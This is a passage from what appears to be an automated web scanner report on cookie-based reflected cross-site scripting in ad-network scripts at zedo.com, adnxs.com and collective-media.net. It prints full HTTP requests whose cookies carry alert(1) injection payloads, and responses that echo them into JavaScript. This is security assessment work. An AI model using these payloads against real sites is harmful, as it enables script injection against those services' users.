Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~0104115f097"-alert(1)-"548f1a5dacf; __qca=P0-2130372027-1295906131971; ZEDOIDX=29; FFAbh=766B305,20|320_1#365; ZFFAbh=749B826,20|1643_1#382Z1483_768#365; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640:1025,196206,196207,95694|1,24,1:0,40,1:0,40,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1:0,40,1:0,42,3:0,40,1; FFgeo=5386156; PI=h884566Za747317Zc305004506%2C305004506Zs916Zt143; ZCBC=1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:0,42,1; FFcat=305,4506,17:1120,1,9; FFad=0:0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=0:0:0;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=305,2942,9:305,4506,17:1120,1,9;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "419234-82a5-4988a5a7ea280"
Vary: Accept-Encoding
X-Varnish: 1882666994
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=63
Expires: Mon, 14 Feb 2011 01:30:24 GMT
Date: Mon, 14 Feb 2011 01:29:21 GMT
Connection: close
Content-Length: 4273

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=916;var zzPat='';var zzC
...[SNIP]...

var zzStr = "s=916;u=INmz6woBADYAAHrQ5V4AAACH~0104115f097"-alert(1)-"548f1a5dacf;z=" + Math.random();
var ainfo = "";

var zzDate = new Date();
var zzWindow;
var zzURL;
if (typeof zzCustom =='undefined'){var zzIdxCustom ='';}
else{var zzIdxCustom = zzCustom;}
if (typeof zzTrd
...[SNIP]...

1.498. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [ZEDOIDA cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/bar/v16-401/d3/jsc/fm.js

Issue detail

The value of the ZEDOIDA cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 296a5"-alert(1)-"d10b3dd5fdd was submitted in the ZEDOIDA cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bar/v16-401/d3/jsc/fm.js?c=1&a=0&f=&n=1120&r=13&d=9&q=&$=&s=1&z=0.5481068452354521 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech;alias=legacy.legacy.home.300x250.2.1;target=_blank;grp=1473244827;misc=2328660423
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411296a5"-alert(1)-"d10b3dd5fdd; __qca=P0-2130372027-1295906131971; ZEDOIDX=29; FFAbh=766B305,20|320_1#365; ZFFAbh=749B826,20|1643_1#382Z1483_768#365; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640:1025,196206,196207,95694|1,24,1:0,40,1:0,40,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1:0,40,1:0,42,3:0,40,1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:0,41,1; FFgeo=5386156; PI=h884566Za747317Zc305004506%2C305004506Zs916Zt143

Response (redirected)

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFChanCap=1504B1120,1#734726|0,1,1;expires=Wed, 16 Mar 2011 01:15:16 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=1120,1,9;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "812b9fe7-809a-4989a59833840"
Vary: Accept-Encoding
X-Varnish: 2233582316
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=56
Expires: Mon, 14 Feb 2011 01:16:12 GMT
Date: Mon, 14 Feb 2011 01:15:16 GMT
Connection: close
Content-Length: 2262

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat='';var zzCusto
...[SNIP]...
lert(1)-"d10b3dd5fdd';

var zzhasAd=undefined;

var zzStr = "s=1;u=INmz6woBADYAAHrQ5V4AAACH~010411296a5"-alert(1)-"d10b3dd5fdd;z=" + Math.random();
var ainfo = "";

var zzDate = new Date();
var zzWindow;
var zzURL;
if (typeof zzCustom =='undefined'){var zzIdxCustom ='';}
else{var zzIdxCustom = zzCustom;}
if (typeof zzTrd
...[SNIP]...

1.499. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [ZEDOIDA cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/bar/v16-401/d3/jsc/fm.js

Issue detail

The value of the ZEDOIDA cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3cf59"-alert(1)-"fb9a43b493b was submitted in the ZEDOIDA cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bar/v16-401/d3/jsc/fm.js?c=1&a=0&f=&n=1120&r=13&d=9&q=&$=&s=1&z=0.7238910468295217 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech;alias=microsite.microsite-2011.lifestoryphotogallery.300x250.2.1;target=_blank;kvpersonid=148615818;kvfhid=1;sub1=Betty;sub2=Garrett;grp=5119389398;misc=4469713464
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~0104113cf59"-alert(1)-"fb9a43b493b; __qca=P0-2130372027-1295906131971; ZEDOIDX=29; FFAbh=766B305,20|320_1#365; ZFFAbh=749B826,20|1643_1#382Z1483_768#365; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640:1025,196206,196207,95694|1,24,1:0,40,1:0,40,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1:0,40,1:0,42,3:0,40,1; FFgeo=5386156; PI=h884566Za747317Zc305004506%2C305004506Zs916Zt143; ZCBC=1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:0,42,1; FFcat=305,4506,17:1120,1,9; FFad=0:0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:1,42,1;expires=Wed, 16 Mar 2011 01:29:21 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=1120,1,9:305,4506,17;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=1:0;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "19b436a-82a5-4989a5927aac0"
Vary: Accept-Encoding
X-Varnish: 2233582065 2233582057
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=283
Expires: Mon, 14 Feb 2011 01:34:04 GMT
Date: Mon, 14 Feb 2011 01:29:21 GMT
Connection: close
Content-Length: 2116

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat='';var zzCusto
...[SNIP]...
n')zzuid='INmz6woBADYAAHrQ5V4AAACH~0104113cf59"-alert(1)-"fb9a43b493b';

var zzhasAd=undefined;

var zzStr = "s=1;u=INmz6woBADYAAHrQ5V4AAACH~0104113cf59"-alert(1)-"fb9a43b493b;z=" + Math.random();
var ainfo = "";

var zzDate = new Date();
var zzWindow;
var zzURL;
if (typeof zzCustom =='undefined'){var zzIdxCustom ='';}
else{var zzIdxCustom = zzCustom;}
if (typeof zzTrd
...[SNIP]...

1.500. http://d7.zedo.com/bar/v16-401/d3/jsc/fmr.js [ZEDOIDA cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/bar/v16-401/d3/jsc/fmr.js

Issue detail

The value of the ZEDOIDA cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8c93a"-alert(1)-"b3a2dd65c8e was submitted in the ZEDOIDA cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bar/v16-401/d3/jsc/fmr.js?c=1&a=0&f=&n=1120&r=13&d=9&q=&$=&s=1&z=0.5481068452354521 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech;alias=legacy.legacy.home.300x250.2.1;target=_blank;grp=1473244827;misc=2328660423
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~0104118c93a"-alert(1)-"b3a2dd65c8e; __qca=P0-2130372027-1295906131971; ZEDOIDX=29; FFAbh=766B305,20|320_1#365; ZFFAbh=749B826,20|1643_1#382Z1483_768#365; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640:1025,196206,196207,95694|1,24,1:0,40,1:0,40,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1:0,40,1:0,42,3:0,40,1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:0,41,1; FFgeo=5386156; PI=h884566Za747317Zc305004506%2C305004506Zs916Zt143; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:0,42,1;expires=Wed, 16 Mar 2011 01:15:09 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=1120,1,9;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "812b9fe7-809a-4989a59833840"
Vary: Accept-Encoding
X-Varnish: 2233582316
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=50
Expires: Mon, 14 Feb 2011 01:15:59 GMT
Date: Mon, 14 Feb 2011 01:15:09 GMT
Connection: close
Content-Length: 2116

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat='';var zzCusto
...[SNIP]...
n')zzuid='INmz6woBADYAAHrQ5V4AAACH~0104118c93a"-alert(1)-"b3a2dd65c8e';

var zzhasAd=undefined;

var zzStr = "s=1;u=INmz6woBADYAAHrQ5V4AAACH~0104118c93a"-alert(1)-"b3a2dd65c8e;z=" + Math.random();
var ainfo = "";

var zzDate = new Date();
var zzWindow;
var zzURL;
if (typeof zzCustom =='undefined'){var zzIdxCustom ='';}
else{var zzIdxCustom = zzCustom;}
if (typeof zzTrd
...[SNIP]...

1.501. http://ib.adnxs.com/acb [acb816623 cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/acb

Issue detail

The value of the acb816623 cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7b313'-alert(1)-'9993ffb1984 was submitted in the acb816623 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /acb?member=311&width=300&height=250&pb=300&cb=4221178&referrer= HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess=1; icu=ChEIsHAQChgBIAEoATD_jeLqBAoRCI54EAoYAiACKAIwoY7i6gQKEQjMeBAKGAEgASgBMIue4uoEChII_IgBEAoYASABKAEw3I3i6gQKEgi_jwEQChgBIAEoATCLjeLqBBCLnuLqBBgF; acb816623=5_[r^208WMv$PLv20/dR:zugL?enc=q6qqqqqqCkAAAAAAAAAIQAAAAAAAAAhAFo_mI4TiCkDDEDl9Pd8NQA5lMDecLTkCBWHfHSmrEEILj1hNAAAAAAk5AwA3AQAANQEAAAIAAADifwEA5FoAAAEAAABVU0QAVVNEACwB-gCZFNQEqAgBAgUCAAIAAAAAYxn0oAAAAAA.&tt_code=cm.drudgerep&udj=uf%28%27a%27%2C+3338%2C+1297649419%29%3Buf%28%27c%27%2C+15498%2C+1297649419%29%3Buf%28%27r%27%2C+98274%2C+1297649419%29%3Bppv%282932%2C+%27160209410712429838%27%2C+1297649419%2C+1297735819%2C+15498%2C+23268%29%3B&cnd=!VxeUoQiKeRDi_wUYACDktQEo1Akxqazeuz3fDUBCEwgAEAAYACABKP7__________wFIAFAAWJkpYABotQI.7b313'-alert(1)-'9993ffb1984; uuid2=4760492999213801733; anj=Kfw)mByDua)J710Ac5GcR!f@(ROX+G.i%-y.h2m%qj7e'(H1jcb#3G?aq.m2Ykj?PDQ18y2vSb1*ds9cO'ZB926yv^%?7':i^LR!)'U9qU1a2##<jV2FH4.>4YqxqfIC/Ir/(bO0p4FCo)YW9.prYxe0v%M:F=tvrWCs<l2ZIKr2w%S$G(H/o8+UPjm?x3:9_*#]wBGCpFqkhK=<bzA>cw#Z[W6>YJ^'Qr2#CNc2M>-]sOFY8ZhnxNN/Dx=:Z-Kv6+BVOBOnZNbtP#encho)SHW7WN!SeV=mT_9.G6J6Jv<s]RlGuqXm]Hc^i)7n9qn>nsQ<_(+.nhJ<f%Ccx54(LFjprN3tM+ST9s0YZ'xdQe/LQsNg<Wg/ktzbjNOU^GSM36c4re:c_dBck]ow89]LasnMwZuoQR?dIKhc)BSuKCjmJYcKUA9N$ZMTc(Wrv-la-%-_*GbC7a2f4i-1X(8IZJUDRaTKJvm(w%A28:xMW:NLzt%QdAMDhF#MEx$`=4dMc=5fkTF+h<J[mOjuWvOa/>UHDjzZlk:.NIvxF7>_dNRO)eM*mTQ=u?]w@$vjJ6ix<KR)GwX:48(S7uNg!'*V)@PBJPrP>6Qq@wFiUwW`EXQALy+Kcu0r%o:A<r%s?TaCpg6$q0j``ivp6Q[1yjwGrz+92PXhrBM5Rt#>E/DusgcXqu'Wg*O/qRH

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 15-Feb-2011 02:10:33 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Sun, 15-May-2011 02:10:33 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb816623=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/html; charset=utf-8
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Sun, 15-May-2011 02:10:33 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfw)mByDua)J710Ac5GcR!f@(ROX+G.i%-y.h2m%qj7e'(H1jcb#3G?aq.m2Ykj?PDQ18y2vSb1*ds9cO'ZB926yv^%?7':i^LR!)'U9qU1a2##<jV2FH4.>4YqxqfIC/Ir/(bO0p4FCo)YW9.prYxe0v%M:F=tvrWCs<l2ZIKr2w%S$G(H/o8+UPjm?x3:9_*#]wBGCpFqkhK=<bzA>cw#Z[W6>YJ^'Qr2#CNc2M>-]sOFY8ZhnxNN/Dx=:Z-Kv6+BVOBOnZNbtP#encho)SHW7WN!SeV=mT_9.G6J6Jv<s]RlGuqXm]Hc^i)7n9qn>nsQ<_(+.nhJ<f%Ccx54(LFjprN3tM+ST9s0YZ'xdQe/LQsNg<Wg/ktzbjNOU^GSM36c4re:c_dBck]ow89]LasnMwZuoQR?dIKhc)BSuKCjmJYcKUA9N$ZMTc(Wrv-la-%-_*GbC7a2f4i-1X(8IZJUDRaTKJvm(w%A28:xMW:NLzt%QdAMDhF#MEx$`=4dMc=5fkTF+h<J[mOjuWvOa/>UHDjzZlk:.NIvxF7>_dNRO)eM*mTQ=u?]w@$vjJ6ix<KR)GwX:48(S7uNg!'*V)@PBJPrP>6Qq@wFiUwW`EXQALy+Kcu0r%o:A<r%s?TaCpg6$q0j``ivp6Q[1yjwGrz+92PXhrBM5Rt#>E/DusgcXqu'Wg*O/qRH; path=/; expires=Sun, 15-May-2011 02:10:33 GMT; domain=.adnxs.com; HttpOnly
Date: Mon, 14 Feb 2011 02:10:33 GMT
Content-Length: 5609

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">
<!--
(function(){var flashAd='<OBJECT id="160209410712429838" data="http://cdn.
...[SNIP]...
TkCBWHfHSmrEEILj1hNAAAAAAk5AwA3AQAANQEAAAIAAADifwEA5FoAAAEAAABVU0QAVVNEACwB-gCZFNQEqAgBAQUCAAIAAAAAYhnjoAAAAAA./cnd=!VxeUoQiKeRDi_wUYACDktQEo1Akxqazeuz3fDUBCEwgAEAAYACABKP7__________wFIAFAAWJkpYABotQI.7b313'-alert(1)-'9993ffb1984/clickenc=http%3A%2F%2Fwww.paloaltonetworks.com%2Fcam%2FgartnerMQ%2Freport.php%3Fts%3DRetargeter" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" WIDTH="300" HEIGHT="250" flashvars="clickTag=http:
...[SNIP]...

1.502. http://k.collective-media.net/cmadj/cm.dailymail/ron_052010 [cli cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://k.collective-media.net
Path:	/cmadj/cm.dailymail/ron_052010

Issue detail

The value of the cli cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 764c2"%3balert(1)//cda0fdaa892 was submitted in the cli cookie. This input was echoed as 764c2";alert(1)//cda0fdaa892 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

